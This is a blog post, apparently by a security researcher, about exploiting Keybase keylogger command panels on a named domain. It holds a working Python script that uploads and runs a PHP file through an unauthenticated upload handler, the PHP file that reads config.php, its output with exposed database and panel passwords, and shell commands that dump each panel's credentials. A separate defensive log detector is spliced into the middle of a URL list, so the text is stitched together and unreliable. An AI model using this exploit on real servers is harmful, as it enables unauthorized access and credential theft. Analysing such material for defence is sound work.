1 panel, 2 panels, 3 panels...
I was hanging out on Cybercrime-Tracker and noticed some Keybase panels. I had never heard of that one before, so I decided to take a look. It turns out Keybase is not a botnet but a keylogger; it can also take screenshots of the victim's desktop.
One of the domains was still up, and there were 3 Keybase panels listed on Cybercrime-Tracker:
- www.omarabdulaziz.com/golden/login.php
- www.omarabdulaziz.com/daniel/login.php
- www.omarabdulaziz.com/ugo/login.php
The first flaw is that permissions are not checked on the /image/Images directory, so anyone who knows about it can browse the screenshots.
The first two panels didn't have the /image/upload.php file, but luckily for me the ugo panel did.
Unit 42 had already found some nice vulnerabilities in the Keybase source code, so I tried them.
I ran this Python script with the PHP file below as its argument.
```python
import requests
import sys

if len(sys.argv) != 2:
    print("Usage: %s [php_file]" % __file__)
    sys.exit(1)

URL = "http://www.omarabdulaziz.com/ugo/"

print("Sending request...")
# The panel's upload handler does not check who is uploading or what the file is,
# so the PHP file is stored under its given name.
multiple_files = [('file', ('owned.php', open(sys.argv[1], 'rb')))]
r = requests.post(URL + "image/upload.php", files=multiple_files)
print(r)
print("Results:")
print()
# The file lands in the unprotected Images directory, where the server executes it.
r = requests.get(URL + "image/Images/owned.php")
print(r.text)
```
```php
<?php
// Path is relative to image/Images/, so this points at the panel's own config.php
$file = '../../config.php';
echo "It works!"."</br>";
if (file_exists($file)) {
    echo "Reading file"."</br>";
    echo file_get_contents($file);
}
?>
```
Here's the result:
```
Sending request...
<Response [200]>
Results:

It works!</br>Reading file</br><?php
ob_start();
//Edit your database details
$mysql_host = "localhost";
$mysql_database = "omarabdu_ugo";
$mysql_user = "omarabdu_ugo";
$mysql_password = "joinkrama2";
//These are for accessing your web-panel. You can change these any time.
$panelusername = "admin";
$panelpassword = "ugo12345";
?>
```
So of course... I got in.
That's pretty cool, but are all the panels on this domain actually listed on Cybercrime-Tracker? I took a look at the public_html folder and found additional panels:
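Seen from the defender's side, the whole chain above rests on two things: an upload handler that accepts any file from anyone, and a screenshot directory that is both browsable and executes scripts. The following Python is an added example, not code from the original post, that runs over a constructed Apache-style access log and flags that upload-then-execute pattern; the paths follow the Keybase panel layout used above, while the IP addresses (TEST-NET ranges) and timestamps are invented.

```python
import re

# Apache "combined" access-log line; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Keybase panel layout from the write-up: the unauthenticated uploader and the
# screenshot directory it writes into (compared case-insensitively).
UPLOAD_HANDLER = "/image/upload.php"
UPLOAD_DIR = "/image/images/"

# Constructed sample log (TEST-NET addresses, invented timestamps), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2016:13:55:36 +0000] "GET /ugo/login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2016:13:55:40 +0000] "POST /ugo/image/upload.php HTTP/1.1" 200 12 "-" "python-requests/2.9"
203.0.113.5 - - [10/Oct/2016:13:55:41 +0000] "GET /ugo/image/Images/owned.php HTTP/1.1" 200 512 "-" "python-requests/2.9"
198.51.100.7 - - [10/Oct/2016:14:01:02 +0000] "GET /ugo/image/Images/shot_0001.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2016:14:01:09 +0000] "GET /daniel/image/Images/x.php HTTP/1.1" 404 201 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the captured fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect_webshell_upload(lines):
    """Return (ip, kind, path) findings for two signals of the upload flaw.
    'script_in_upload_dir': a .php requested from inside the screenshot directory,
    which should only ever serve images. 'upload_then_exec': the same client first
    POSTed to that panel's upload.php and then fetched a .php from its upload dir.
    """
    posted = set()  # (ip, panel prefix) pairs that have hit the uploader
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        path = ev["path"].split("?", 1)[0]
        low = path.lower()
        if ev["method"] == "POST" and low.endswith(UPLOAD_HANDLER):
            posted.add((ev["ip"], low[: -len(UPLOAD_HANDLER)]))
        elif UPLOAD_DIR in low and low.endswith(".php"):
            panel = low.split(UPLOAD_DIR, 1)[0]
            kind = "upload_then_exec" if (ev["ip"], panel) in posted else "script_in_upload_dir"
            findings.append((ev["ip"], kind, path))
    return findings
```

A 404 on the script fetch is still reported, since a failed attempt is worth seeing as much as a successful one.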
- http://www.omarabdulaziz.com/chuks/login.php
- http://www.omarabdulaziz.com/panel2/login.php
- http://www.omarabdulaziz.com/nonso/login.php
- http://www.omarabdulaziz.com/owerri/login.php
So there you have it. Since we have command execution, we can grab the passwords for all the panels at once:
```sh
cat /home/omarabdu/public_html/ugo/config.php &
cat /home/omarabdu/public_html/daniel/config.php &
cat /home/omarabdu/public_html/golden/config.php &
cat /home/omarabdu/public_html/chuks/config.php &
cat /home/omarabdu/public_html/panel2/config.php &
cat /home/omarabdu/public_html/owerri/config.php
cat /home/omarabdu/public_html/nonso/config.php
```
Let me know what you think of this article on Twitter @misterch0c or leave a comment below!